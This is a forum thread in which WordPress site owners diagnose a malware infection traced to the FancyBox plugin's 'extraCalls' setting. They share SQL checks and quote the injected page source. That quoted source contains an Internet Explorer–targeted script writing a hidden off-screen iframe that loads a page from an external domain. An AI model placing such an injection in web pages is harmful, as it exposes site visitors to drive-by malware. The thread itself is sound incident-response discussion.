Possible malware

Johan thanks, I have sent this forum link to Host Gator security so they can keep an eye on the discussion here. At first I thought it was a new theme I added, but my other sites are not effected with this new theme, so I am thinking it might this FacnyBox plugin as I am not using this plugin on any of them.

Can everyone run “select * from wp_options where option_name = ‘mfbfw’;” in mysql and post back the result. We believe it’s the exit point for the code.

Ninjafirewall has just posted something about it:

https://ninjafirewall.com/malware/index.php?threat=2015-02-04.01

are you talking about this a:2:{s:10:”extraCalls”;s:1:” “;s:16:”extraCallsEnable”;s:2:”on”;}

Yes, the extraCalls parameter is being altered under certain circumstances (via db, or option filters) and then output here: https://plugins.trac.www.ads-software.com/browser/fancybox-for-wordpress/trunk/fancybox.php#L309

Here is what I get:

Error

SQL query: Documentation

SELECT option_name
FROM wp_options
WHERE mfbfw
LIMIT 0 , 30

MySQL said: Documentation
#1054 – Unknown column ‘mfbfw’ in ‘where clause’

Wrong query RedKobra. select * from wp_options where option_name = 'mfbfw'; is the correct one. It’s probably empty for you as well.

a:2:{s:10:”extraCalls”;s:1:” “;s:16:”extraCallsEnable”;s:2:”on”;}

In Fancybox f WP options there is a tab called “ExtraCalls”. “Extracalls” should be disabled by default but actually is enabled.

Sub’d.

A few clients affected…

mfbfw seems to just be the uninstaller for the program

MySQL returned an empty result set (i.e. zero rows). ( Query took 0.0004 sec )

Fancybox might be a false lead, just a very common plugin; still investigating. Anyone seen it live? If so what browser and page please?

I got “a:2:{s:10:”extraCalls”;s:1:” “;s:16:”extraCallsEnable”;s:2:”on”;}” as well.

<!-- Fancybox for WordPress v3.0.2 -->\n<script type=\"text/javascript\">\njQuery(function(){\n\njQuery.fn.getTitle = function() { // Copy the title of every IMG tag and add it to its parent A so that fancybox can show titles\n  var arr = jQuery(\"a.fancybox\");\n     jQuery.each(arr, function() {\n         var title = jQuery(this).children(\"img\").attr(\"title\");\n           jQuery(this).attr(\'title\',title);\n   })\n}\n\n// Supported file extensions\nvar thumbnails = jQuery(\"a:has(img)\").not(\".nolightbox\").filter( function() { return /\\.(jpe?g|png|gif|bmp)$/i.test(jQuery(this).attr(\'href\')) });\n\n\njQuery(\"a.fancybox\").fancybox({\n       \'cyclic\': false,\n    \'autoScale\': false,\n \'padding\': ,\n        \'opacity\': false,\n   \'speedIn\': ,\n        \'speedOut\': ,\n       \'changeSpeed\': ,\n    \'overlayShow\': false,\n       \'overlayOpacity\': \"\",\n     \'overlayColor\': \"\",\n       \'titleShow\': false,\n \'titlePosition\': \'\',\n      \'enableEscapeButton\': false,\n        \'showCloseButton\': false,\n   \'showNavArrows\': false,\n     \'hideOnOverlayClick\': false,\n        \'hideOnContentClick\': false,\n        \'width\': ,\n  \'height\': ,\n \'transitionIn\': \"\",\n       \'transitionOut\': \"\",\n      \'centerOnScroll\': false\n});\n\n})\n</script>\n<script>if (navigator.userAgent.match(/msie/i)) { document.write(\' <div style=\"position:absolute;left:-2000px;width:2000px\"><iframe src=\"https://203koko.eu/hjnfh/ipframe2.php\" width=\"20\"
height=\"30\" ></iframe></div>\'); }</script>\n<script>({\n\n})\n</script>\n<!-- END Fancybox for WordPress -->

The script was output inside Fancybox judging by the START and END comments, so disable Fancybox as a quick solution.